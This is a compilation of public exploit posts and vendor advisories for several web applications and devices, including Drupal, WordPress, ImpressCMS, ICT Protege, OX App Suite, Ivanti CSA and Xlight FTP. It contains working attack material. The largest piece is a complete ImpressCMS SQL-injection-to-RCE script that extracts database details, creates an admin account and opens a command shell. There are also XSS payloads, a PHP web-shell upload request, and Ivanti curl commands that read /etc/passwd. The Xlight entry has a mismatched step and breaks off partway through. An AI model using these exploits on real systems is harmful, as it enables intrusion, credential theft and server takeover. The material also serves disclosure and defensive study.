<pre><code># Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)<br /># Date: 2022-03-22<br /># Author: Milad karimi<br /># Software Link: https://www.drupal.org/project/avatar_uploader<br /># Version: v7.x-1.0-beta8<br /># Tested on: Windows 10<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates an avatar_uploader from any post type. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated<br /># Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/<br /># Date: 23-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/<br /># Version: 3.7.3<br /># Tested on: Firefox<br /><br /># Vulnerable File: dispatcher.php<br /><br /># Vulnerable Code:<br /><br />```<br />if ( isset($_GET['open']) ) {<br /> include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);<br />} else {<br /> echo '<br /> <div id="welcome-panel" class="welcome-panel"<br />style="padding-bottom: 20px;"><br /> <div class="welcome-panel-column-container">';<br /><br /> include_once( ABSPATH . WPINC . '/feed.php' );<br />```<br /><br /># Proof of Concept:<br /><br />localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]<br /><br /></code></pre>
<pre><code><?php

/*
 ----------------------------------------------------------
 ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution
 ----------------------------------------------------------
 
 author..............: Egidio Romano aka EgiX
 mail................: n0b0d13s[at]gmail[dot]com
 software link.......: https://www.impresscms.org
 
 +-------------------------------------------------------------------------+
 | This proof of concept code was written for educational purpose only. |
 | Use it at your own risk. Author will be not responsible for any damage. |
 +-------------------------------------------------------------------------+
 
 [-] Vulnerability Description:
 
 User input passed through the "groups" POST parameter to the /include/findusers.php script is not
 properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and
 icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to
 construct a SQL query without proper validation, and this can be exploited by remote attackers
 to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection
 attacks. The application uses PDO as a database driver, which allows for stacked SQL queries,
 as such this vulnerability could be exploited to e.g. create a new admin user and execute
 arbitrary PHP code.
 
 [-] CVE Reference:

 The Common Vulnerabilities and Exposures project (cve.mitre.org)
 has assigned the name CVE-2021-26599 to this vulnerability.

 [-] Disclosure timeline:
 
 [19/01/2021] - Vendor notified through HackerOne
 [29/01/2021] - Vulnerability acknowledged by the vendor
 [03/02/2021] - CVE number assigned
 [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed
 [11/02/2022] - Vendor was informed about the ineffective fix
 [09/03/2022] - Version 1.4.4 released
 [22/03/2022] - Public disclosure
 
 [-] Technical writeup:

 http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce
*/

// Reviewer summary (defensive reading of the script): it drives the injection
// described above in four stages - session/token retrieval, blind extraction of
// the database name and table prefix, insertion of an administrative user, and
// installation of an "autotask" that runs commands taken from an HTTP header.
// Each stage leaves host- and log-side artefacts, noted inline below. The
// timeline above lists 1.4.4 as the release that followed the report of the
// ineffective 1.4.3 fix.

// The blind loops below issue many sequential requests, so the execution time
// limit is lifted. Reporting only E_ERROR also hides the undefined-variable
// notice/warning that hex_enc() would otherwise emit (see $encoded there).
set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

// Returns $input as a MySQL hexadecimal literal: "0x" followed by two hex
// digits per byte. $encoded is never initialised before the first ".=", which
// only goes unreported because of the error_reporting() setting above.
function hex_enc($input)
{
 for ($i = 0; $i < strlen($input); $i++)
 $encoded .= sprintf("%02x", ord($input[$i]));
 return "0x{$encoded}";
}

print "+-----------------------------------------------------------+\n";
print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------+\n";

// Single positional argument: the site base URL, used verbatim as a prefix for
// every request below (so it is expected to end with "/").
if ($argc != 2)
{
 print "\nUsage: php $argv[0] <URL>";
 print "\nExample.: php $argv[0] http://localhost/impresscms/";
 print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
 die();
}

$url = $argv[1];
$ch = curl_init();

// One cURL handle is reused for every request. Response headers are kept
// (CURLOPT_HEADER) so Set-Cookie can be parsed out; TLS certificate
// verification is disabled. No User-Agent is set, so cURL's default is sent -
// a useful distinguishing feature in web server logs.
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

print "\n[+] Retrieving security token (CVE-2021-26598)\n"; 

// Stage 1: an unauthenticated GET to misc.php yields both a session cookie and
// a TOKEN_REQUEST value; the later POSTs replay them. Log signature: this GET
// immediately followed by a burst of POSTs to include/findusers.php.
curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");

$res = curl_exec($ch);

if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n");
if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n");

print "[+] Starting SQL Injection attack (CVE-2021-26599)\n";
print "[*] Step 1: retrieving database name\n";

curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]);

// Template for every injection request; %s receives the URL-encoded payload
// carried in the groups[] parameter named in the description above.
$params = "user_submit=1&token={$token[1]}&groups[]=%s";

$min = true;
$idx = 1;

// Stage 2a: boolean-based blind extraction of DATABASE(), one character per
// outer iteration. The inner loop is an 8-step binary search on the ordinal
// value (steps of 2^7 .. 2^0); $min === true means "the character is below the
// current guess". The oracle is the presence of "No Users Found" in the page.
// A zero ordinal ends the string. Cost: 8 POSTs per character, each carrying
// SQL in groups[] - a clear pattern for WAF rules and log review.
while(1)
{
 $test = 256;

 for ($i = 7; $i >= 0; $i--)
 {
 $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
 $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#";
 curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
 $min = !preg_match("/No Users Found/", curl_exec($ch));
 }

 if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
 $dbname .= chr($chr); $min = true; $idx++;
 print "\r[+] DB name: {$dbname}";
}

print "\n[*] Step 2: retrieving tables prefix\n";

// Stage 2b: same binary search, but the table prefix is read from
// information_schema through a stacked PREPARE/EXECUTE statement whose only
// observable result is timing: SLEEP(1) fires when the character is not below
// the guess, and a request taking 2 s or more is treated as "not below".
// Artefact: bursts of ~1 s-delayed POSTs to include/findusers.php.
$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'";
$min = true;
$idx = 1;

while(1)
{
 $test = 256;

 for ($i = 7; $i >= 0; $i--)
 {
 $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
 $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))");
 $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#";
 curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
 $start = time(); curl_exec($ch); $secs = time() - $start;
 $min = ($secs < 2);
 }

 if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
 $prefix .= chr($chr); $min = true; $idx++;
 print "\r[+] Prefix: {$prefix}";
}

print "\n[*] Step 3: creating new admin user\n";

// Stage 3: two stacked INSERTs add a user "egix" (uid = current Unix time,
// level 5, enc_type 0, MD5 password hash) and link it to group 1.
// IR artefacts: a <prefix>users row whose uid equals the attack timestamp and
// whose uname/login_name is "egix", plus the matching groups_users_link row.
$uid = time();
$enc = hex_enc("egix");
$pwd = hex_enc(md5("egix"));
$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#";

curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#";

curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

print "[+] Trying to login as the new user\n";

// Logs in as the new user via user.php; a Set-Cookie header in the response is
// taken as success and replaces the earlier anonymous session.
curl_setopt($ch, CURLOPT_URL, "{$url}user.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login");

if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n");

print "[+] Creating malicious autotask\n";

// Stage 4: with the admin session, an enabled autotask named "rce" is created
// whose stored PHP base64-decodes the CMD request header into passthru() and
// prints "____" as a marker before the output. A 302 response is taken as
// success. IR artefacts: an autotask row named "rce" containing passthru(),
// and subsequent requests to the site root carrying a "CMD:" header.
$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }");

curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks");

if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n");

print "[+] Launching shell\n";

// Interactive loop: each line read from stdin is base64-encoded into the CMD
// header of a GET to the site root, and everything after the "____" marker in
// the response is printed. Typing "exit" ends the loop; a response without the
// marker aborts the script.
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
 print "\nimpresscms-shell# ";
 if (($cmd = trim(fgets(STDIN))) == "exit") break;
 curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
 preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}


</code></pre>
<pre><code><br />ICT Protege GX/WX 2.08 Client-Side SHA1 Password Hash Disclosure<br /><br /><br />Vendor: Integrated Control Technology Ltd.<br />Product web page: https://www.ict.co<br />Affected version: GX: Ver: 2.08.1002 K1B3<br /> Lib: 04.00.217<br /> Int: 2.3.235.J013<br /> OS: 2.0.20<br /> WX: Ver: 4.00 284 H062<br /> App: 02.08.766<br /> Lib: 04.00.169<br /> Int: 02.2.208<br /><br />Summary: Protege GX is an enterprise level integrated access control, intrusion<br />detection and building automation solution with a feature set that is easy to<br />operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,<br />web-based, cross-platform system that gives you a fully functional access control<br />and intrusion detection solution in a fraction of the time of conventional software.<br />With no software to install, setup is quick and simple. Connect the Controller and<br />system components, then open a web browser to launch the intuitive wizard-driven<br />interface which guides you through the process of configuring your system.<br /><br />Desc: The application is vulnerable to improper access control that allows an<br />authenticated operator to disclose SHA1 password hashes (client-side) of other<br />users/operators.<br /><br />Tested on: Microsoft-WinCE/6.00<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5700<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php<br /><br /><br />08.02.2022<br /><br />--<br /><br /><br />Navigate to http://CONTROLLER_IP/operator.htm<br /><br />Source:<br /><br /><p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change 
Password"></p><br />...<br />...<br /><input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc"><br />...<br /></code></pre>
<pre><code><br />ICT Protege GX/WX 2.08 Authenticated Stored XSS Vulnerability<br /><br /><br />Vendor: Integrated Control Technology Ltd.<br />Product web page: https://www.ict.co<br />Affected version: GX: Ver: 2.08.1002 K1B3<br /> Lib: 04.00.217<br /> Int: 2.3.235.J013<br /> OS: 2.0.20<br /> WX: Ver: 4.00 284 H062<br /> App: 02.08.766<br /> Lib: 04.00.169<br /> Int: 02.2.208<br /><br />Summary: Protege GX is an enterprise level integrated access control, intrusion<br />detection and building automation solution with a feature set that is easy to<br />operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,<br />web-based, cross-platform system that gives you a fully functional access control<br />and intrusion detection solution in a fraction of the time of conventional software.<br />With no software to install, setup is quick and simple. Connect the Controller and<br />system components, then open a web browser to launch the intuitive wizard-driven<br />interface which guides you through the process of configuring your system.<br /><br />Desc: The application suffers from an authenticated stored XSS vulnerability.<br />The issue is triggered when input passed to the 'Name' parameter is not properly<br />sanitized before being returned to the user. 
This can be exploited to execute<br />arbitrary HTML and script code in a user's browser session in context of an<br />affected site.<br /><br />Tested on: Microsoft-WinCE/6.00<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5699<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php<br /><br /><br />08.02.2022<br /><br />--<br /><br /><br />UI navigation:<br />--------------<br /><br />Scheduling > Daylight Savings > (Name field).<br /><br /><br />Decrypted POST request:<br />-----------------------<br /><br />POST /daylightsaving.htm<br /><br />Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1<br /><br /><br />Encrypted GET request:<br />----------------------<br /><br />http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll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br /><br /><br />Additional info:<br />----------------<br /><br />Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak<br />The D3037E8A is the serial number of the onboard reader.<br /><br />Encrypt/Decrypt functions:<br />--------------------------<br /><br />From console:<br />> localStorage.getItem("WXKey")<br />< '8EDB22D9FB767538'<br /><br />function encryptAES(a, c) {<br /> a = a.toString();<br /> a = unescape(encodeURIComponent(a));<br /> "undefined" == typeof c && (c = !0);<br /> if (0 == servertype)<br /> return a;<br /> var b = localStorage.getItem("WXKey");<br /> if ("" == b || null == b)<br /> return a;<br /> for (var d = "", e = 0; 16 > e; e++)<br /> d += String.fromCharCode(Math.floor(75 * Math.random() + 48));<br /> a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");<br /> return a = c ? 
getCookie("SESSID") + strToHex(a) : strToHex(a)<br />}<br /><br />function decryptAES(a) {<br /> if (null == a)<br /> return "";<br /> a = a.toString();<br /> if ("<invalid session> < Packet not Init and not encrypted. >" == a)<br /> a = 0 == servertype ? "login.php" : "login.htm",<br /> window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();<br /> else if ("<invalid session>" == a.substr(0, 17))<br /> a = 0 == servertype ? "login.php?logout" : "login.htm?logout",<br /> window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();<br /> else {<br /> if (0 == servertype)<br /> return a;<br /> var c = localStorage.getItem("WXKey");<br /> if ("" == c)<br /> return a;<br /> a = hexToStr(a);<br /> var b = a.substr(0, 16);<br /> a = a.substr(16, a.length);<br /> a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");<br /> a = removePKCS7(a);<br /> return a = decodeURIComponent(escape(a))<br /> }<br /></code></pre>
<pre><code>Product: OX App Suite<br />Vendor: OX Software GmbH<br /><br /><br /><br />Internal reference: OXUIB-1092<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev26<br />Vendor notification: 2021-11-15<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44208<br />CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />System messages at the OX Chat component are escaped to avoid injection of malicious code. However, this check is not performed for messages that are "unknown" to the system. Such messages do not occur during normal operations.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require the victim to follow a hyperlink or a compromise of chat components.<br /><br />Steps to reproduce:<br />1. Maliciously modify the chat infrastructure to inject "unknown" messages that contain script code<br />2. 
Make the victim connect to that infrastructure and request messages for their account<br /><br />Solution:<br />We now sanitize "unknown" system messages, in case this scenario may ever happen in the wild.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1322<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-11-12<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44209<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Specific HTML5 tags and some attributes were not sufficiently considered when detecting malicious code that is being served as a download.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Upload an HTML5 document with specific tags, set an HTML file extension but a misleading media-type<br />2. 
Share the file and make a victim click a hyperlink to that resource<br /><br />Proof of concept:<br /><audio src="/appsuite/apps/themes/default/sounds/bell.ogg" onprogress="alert('XSS');" onsuspend="alert('XSS');" controls></audio><br /><br />Solution:<br />We improved HTML detection and examine a complete list of tags, attributes and event handlers.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1260<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-09-27<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44210<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Certain media formats (NIFF, in this case) were not detected to contain potentially harmful content. This can be exploited by an attacker by uploading malicious content in disguise. Some browsers will attempt to render NIFF sources as inline content.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Generate malicious JS/HTML content and upload it as a NIFF image, changing the media-type accordingly<br />2. Share that malicious code using "sharing"<br />3. 
Make a victim follow a link to the malicious share<br /><br />Solution:<br />We now detect NIFF as potentially malicious content and force browsers to download it.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1259<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-09-27<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44211<br />CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML E-Mail signatures are processed by a sanitizer. This sanitizer can be tricked into generating malicious output by injecting seemingly benign garbled HTML code.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require some level of access to the victim's account or context and would have to pull off a social engineering attack.<br /><br />Steps to reproduce:<br />1. Create a malicious E-Mail signature<br />2. 
Share and make a victim select that E-Mail signature<br /><br />Proof of concept:<br /><img src class="src=cid:asd onerror=alert('XSS')//"><br /><br />Solution:<br />We now check the HTML "class" attribute of HTML E-Mail signatures for potentially malicious content.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1219<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-08-17<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44212<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Script tags in HTML content can be obfuscated by using trailing control characters to bypass existing sanitizers.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Create malicious script code and obfuscate HTML tags using control characters<br />2. 
Share the malicious code and make a victim click a link that points to this code<br /><br />Proof of concept:<br /><script\t>alert("XSS");</script\t><br /><br />Solution:<br />We now improve detection of obfuscated HTML tags.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1216<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev32<br />Vendor notification: 2021-08-13<br />Solution date: 2021-12-14<br />Public disclosure: 2022-03-21<br />CVE reference: CVE-2021-44213<br />CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Binary uu-encoded content in multipart/alternative E-Mails is processed as the mail body without sanitization in certain cases.<br /><br />Risk:<br />Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this, the victim needs to interact with the message.<br /><br />Steps to reproduce:<br />1. Generate a malicious mail with binary unix-to-unix content and a specific header structure, add placeholder content to trigger the "Show entire message" feature<br />2. Send that E-Mail to the victim<br />3. As the victim, select the message and follow the "Show entire content" link<br /><br />Proof of concept:<br />?/'-C<FEP=#YA;&5R="@B6%-3(BD[/"]S8W)I<'0^"@`` becomes <script>alert("XSS");</script><br /><br />Solution:<br />We now advertise uu-encoded E-Mail parts as a file attachment rather than as the mail body.<br /></code></pre>
<pre><code># Title: Poultry Farm Management System 1.0 Remote Code Execution (RCE)<br /># Author: Hejap Zairy<br /># Date: 20.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />A registered user can bypass the WAF and upload .php.png files in the attachments section by using the intercept tool in Burp Suite to edit the raw request.<br /><br /><br /># Vulnerable code (PHP)<br />The profile-image upload needs more filtering: the file is stored under its client-supplied name and no file type check is performed.<br /><br />```php<br />if(isset($_POST['submit']))<br />{<br /> $adminid=$_SESSION['odmsaid'];<br /> $productname=$_POST['productName'];<br /> $productimage1=$_FILES["productimage1"]["name"];<br /> move_uploaded_file($_FILES["productimage1"]["tmp_name"],"profileimages/".$_FILES["productimage1"]["name"]);<br /> $sql="update tbladmin set Photo=:productimage1 where ID=:aid";<br /> $query = $dbh->prepare($sql);<br /> $query->bindParam(':productimage1',$productimage1,PDO::PARAM_STR);<br /> $query->bindParam(':aid',$pid,PDO::PARAM_STR);<br /> $query->execute();<br /> $_SESSION['msg']="profile Image Updated Successfully !!";<br /> }<br /> ?><br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /Redcock-Farm/farm/update_image.php?id=2 HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/Redcock-Farm/farm/update_image.php?id=2<br 
/>Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /Redcock-Farm/farm/profileimages/0day_hejap.php?515=echo%200day%20hejap%20Zairy HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Sun, 20 Mar 2022 08:04:28 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 17<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0day hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/uZfnU3c.png<br /></code></pre>
<pre><code># Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution) <br /># Date: 20/03/2022 <br /># Exploit Author: d7x <br /># Vendor Homepage: https://www.ivanti.com/ <br /># Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 <br /># Version: CSA 4.6 4.5 - EOF Aug 2021 <br /># Tested on: Linux x86_64 # CVE : CVE-2021-44529<br /># CVE : CVE-2021-44529<br /><br />###<br />This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): <br />https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US<br /><br />Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies<br /><br />@d7x_real<br />https://d7x.promiselabs.net<br />https://www.promiselabs.net<br />###<br /><br /># cat /etc/passwd<br />curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo<br /><br /># sleep for 10 seconds<br />curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo <br /><br /></code></pre>
<pre><code># Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP)<br /># Exploit Author: Hejap Zairy<br /># Date: 13.07.2022<br /># Software Link: http://www.xlightftpd.com/download/setup.exe<br /># Tested Version: v3.9.3.2(2022-1-5) <br /># Tested on: Windows 10 64bit<br /><br /># 1.- Run python code : 0day-Hejap_Zairy.py<br /># 2.- Open 0day_Hejap.txt and copy All content to Clipboard<br /># 3.- Open Audio Conversion Wizard and press Enter Code<br /># NOTE(review): step 3 names "Audio Conversion Wizard", not the Xlight FTP server this write-up targets, and the numbering skips 4; the step looks carried over from another write-up and should be confirmed.<br /># 5.- Click 'Server ip ' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in ' -> 'Setup'<br /># 6.- Crashed<br /><br /><br /># Author Code By Hejap Zairy<br /># Purpose: writes one crafted string to 0day_hejap.txt; that file's contents are what the steps above paste into the Xlight settings dialog.<br />#!/usr/bin/env python<br /># Author Hejap Zairy <br />#!/usr/bin/env python<br />import struct<br /><br /><br />##================================================================================<br />## 2022-03-12 16:54:06<br />##================================================================================<br />##-----------------------------------------------------------------------------------------------------------------------------------------<br />## Module info :<br />## (author-captured module table; the Rebase / SafeSEH / ASLR / NXCompat columns are the mitigation flags a defender should read first)<br />##-----------------------------------------------------------------------------------------------------------------------------------------<br />## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | 